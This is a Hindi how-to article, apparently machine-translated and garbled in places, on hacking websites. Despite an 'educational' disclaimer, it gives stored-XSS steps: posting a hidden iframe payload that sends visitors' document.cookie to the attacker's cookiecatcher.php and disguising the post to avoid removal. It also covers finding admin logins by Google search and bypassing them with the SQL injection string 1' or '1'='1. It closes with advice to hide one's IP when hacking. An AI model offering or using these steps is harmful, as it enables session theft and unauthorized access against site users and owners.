वेबसाइट का उल्लंघन कैसे करें

ध्यान दें: यह `कैसे करें` लेख कड़ाई से केवल शैक्षिक उद्देश्यों के लिए लिखा जाता है, लोगों को ज्ञान के करीब लाने के लिएहैकिंग व्हाईटहाट

, यानी, एक कानूनी तरीके से एक साइट का उल्लंघन करने के लिए तकनीकों, या हैकर्स कैसे काम करते हैं यह देखने के लिए तकनीकें, ताकि उनकी साइटों को बेहतर तरीके से सुरक्षित किया जा सके। यह ट्यूटोरियल आपको ऐसे निर्देशों के साथ प्रदान करेगा जो कम वेबसाइट की पेशकश करने वाली वेबसाइटों का उपयोग कैसे करें।

कदम

विधि 1
स्क्रिप्टिंग क्रॉस साइट (एक्सएसएस) का उपयोग करें

हैक एक वेबसाइट चरण 1 शीर्षक छवि
1
एक कमजोर साइट खोजें जहां आप सामग्री प्रकाशित कर सकते हैं। बुलेटिन बोर्ड एक अच्छा उदाहरण है याद रखें कि यदि साइट सुरक्षित है, तो यह विधि काम नहीं करेगी
  • हैक एक वेबसाइट चरण 2 शीर्षक छवि
    2
    एक पोस्ट बनाने के लिए जाएं आपको एक विशेष कोड में टाइप करना होगा "पद" जो उस पर क्लिक करने वाले सभी लोगों के डेटा पर कब्जा करेगा।
  • हम आपको यह जांचने के लिए सलाह देते हैं कि क्या सिस्टम कोड को फ़िल्टर करता है। चेतावनी प्रकाशित करें ("कसौटी") (लेकिन उद्धरण हटाएं) यदि आपकी पोस्ट पर एक चेतावनी विंडो दिखाई दे रही है, तो साइट हमला करने के लिए कमजोर है
  • छवि हैक एक वेबसाइट कदम 3
    3
    अपना बनाएं और अपलोड करें कुकी पकड़ने वाला. इस हमले का लक्ष्य उपयोगकर्ता की कुकीज़ को पकड़ना है, जो कमजोर पहुंच वाले वेबसाइटों पर अपने खाते तक पहुंच की अनुमति देता है। आपको एक पकड़ने वाली कुकी की आवश्यकता होगी, जो आपके लक्ष्य की कुकीज़ को कैप्चर करता है और उन्हें रीडायरेक्ट करता है। पकड़ने वाला एक वेबसाइट पर अपलोड करें जिसे आप php भाषा तक पहुंच सकते हैं और समर्थन कर सकते हैं। ऐसे कोड का उदाहरण उदाहरण अनुभाग में पाया जा सकता है।
  • हैक एक वेबसाइट कदम शीर्षक 4 छवि
    4
    पकड़ने वाला कुकी के साथ प्रकाशित करें उस पोस्ट में एक सही कोड दर्ज करें जो कुकीज़ को कैप्चर करेगा और उन्हें आपकी साइट पर भेज देंगे। संदिग्ध को कम करने के लिए और हटाए जाने से आपकी पोस्ट को रोकने के लिए कोड के बाद कुछ पाठ जोड़ना बेहतर होगा।
  • एक उदाहरण कोड निम्न हो सकता है: <... आइफ्रेम ... फ्रेमबार्डर = 0 ऊंचाई = 0 की चौड़ाई = 0 src = जावास्क्रिप्ट ...: शून्य (document.location ="YourURL / cookiecatcher.php? सी ="+ Document.cookie) >< ... / iframe > (लेकिन आपको सभी बिंदुओं को निकालना होगा)
  • छवि हैक एक वेबसाइट कदम 5
    5
    आपके द्वारा एकत्र की गई कुकी का उपयोग करें ऐसा करने के बाद, आप कुकी की जानकारी का उपयोग करने में सक्षम होंगे, जो आपकी साइट पर सहेजी जाएगी, आवश्यक हो सकता है किसी भी उद्देश्य के लिए।
  • विधि 2
    इंजेक्शन प्रकार के हमलों का प्रदर्शन

    हैक एक वेबसाइट कदम शीर्षक 6 छवि
    1
    एक कमजोर साइट खोजें आपको आसानी से पहुंचने वाले व्यवस्थापक लॉगिन में एक दोष के कारण एक साइट को कमजोर होना चाहिए। Google "login.asp व्यवस्थापक" पर खोज करने का प्रयास करें
  • हैक एक वेबसाइट कदम शीर्षक 7 छवि
    2
    एक व्यवस्थापक के रूप में प्रवेश करें यूज़रनेम के रूप में व्यवस्थापक टाइप करें और कई अलग-अलग पासवर्ड स्ट्रिंग में से एक का उपयोग करें। यह कई अलग-अलग स्ट्रिंग्स हो सकता है, लेकिन एक सामान्य उदाहरण है 1 `या` 1 `=` 1.
  • हैक एक वेबसाइट कदम शीर्षक 8 छवि



    3
    धीरज रखो इस प्रक्रिया को शायद कुछ परीक्षण और त्रुटि की आवश्यकता होगी
  • छवि हैक एक वेबसाइट कदम 9
    4
    वेबसाइट पर पहुंचें अंत में, आपको एक स्ट्रिंग ढूंढने में सक्षम होना चाहिए जो व्यवस्थापक को एक वेबसाइट पर पहुंच की अनुमति देता है, यह मानते हुए कि यह हमला करने के लिए कमजोर है।
  • विधि 3
    सफलता के लिए तैयार

    हैक एक वेबसाइट शीर्षक शीर्षक छवि 10
    1
    एक प्रोग्रामिंग भाषा या दो जानें यदि आप वास्तव में वेबसाइटों को हैक करने के तरीके सीखना चाहते हैं, तो आपको यह समझने की आवश्यकता है कि कंप्यूटर और अन्य प्रौद्योगिकियां कैसे काम करती हैं। सर्वोत्तम संभव कंप्यूटर नियंत्रण रखने के लिए और सिस्टम में कमजोरियों की पहचान करने के लिए, पायथन या एसक्यूएल जैसी प्रोग्रामिंग भाषाओं का इस्तेमाल करना सीखें।
  • हैक एक वेबसाइट शीर्षक शीर्षक छवि 11
    2
    आपको HTML की नींव से परिचित होना चाहिए। विशेष रूप से, यदि आप कुछ वेबसाइटों को तोड़ने में सक्षम होना चाहते हैं तो HTML और जावास्क्रिप्ट के बीच बातचीत का पूरी तरह से समझना बेहतर होगा। यह जानने के लिए आपको बहुत समय लगेगा, लेकिन नेट पर आपको कई संसाधन मिल सकते हैं, यहां तक ​​कि निःशुल्क, इसलिए यदि आप इसका लाभ लेना चाहते हैं, तो निश्चित रूप से आप इसे करने का अवसर प्राप्त करेंगे।
  • छवि हैक एक वेबसाइट कदम 12
    3
    व्हाईटहाट देखें: यह हैकर्स जो धर्मार्थ उद्देश्यों के लिए अपनी क्षमताओं का उपयोग करते हैं, सुरक्षा कमजोरियों की खोज करते हैं और इंटरनेट को हर किसी के लिए एक बेहतर स्थान बनाते हैं अगर आप तकनीकों की हैकिंग सीखना चाहते हैं और अपने ज्ञान का उपयोग फायदेमंद उद्देश्यों के लिए या अपनी वेबसाइट की सुरक्षा के लिए करना चाहते हैं, तो आप कुछ सफेदहेट से परामर्श करना चाह सकते हैं जो उपयोगी टिप्स प्राप्त करने के लिए व्यवसाय में हैं।
  • छवि हैक एक वेबसाइट हैक 13 कदम
    4
    अनुसंधान हैकिंग चाहे आप सीखें कि हैकर कैसे बनें या आप खुद को बचाए रखना चाहते हैं, आपको बहुत सारे शोध करना होगा वेबसाइटें बहुत भिन्न पहलुओं के नीचे कमजोर हो सकती हैं, जो की सूची लगातार बदल रही है, इसलिए आपको लगातार अध्ययन करना होगा
  • हैक एक वेबसाइट कदम शीर्षक 14 छवि
    5
    अप-टू-डेट रखें संभावित भेद्यता की सूची लगातार बदलती रहती है, आपको अप-टू-डेट रखने की आवश्यकता होगी। सिर्फ इसलिए कि अब आप एक निश्चित प्रकार के हैक द्वारा संरक्षित हैं इसका मतलब यह नहीं है कि आप सुरक्षित होंगे भविष्य में!
  • टिप्स

    • बहुत उपयोगी टिप्स प्राप्त करने के लिए हैकर मंचों में भाग लें

    चेतावनी

    • हैकिंग कर रहा है अवैध. अगर पुलिस आपको ढूंढती है, तो यह तुम्हारी गलती है
    • यदि आप वास्तविक दुनिया में हैकिंग करने की कोशिश कर रहे हैं, तो ऑनलाइन उपलब्ध सॉफ़्टवेयर का उपयोग करके अपने आईपी पते का छलावरण करें।
    • यदि आप इस लेख को पढ़ते हैं तो आप तुरंत एक हैकर नहीं बनेंगे आप अपने कौशल की खेती करें और बहुत सारे व्यायाम करें।
    सामाजिक नेटवर्क पर साझा करें:

    संबद्ध

    © 2011—2022 GnuMani.com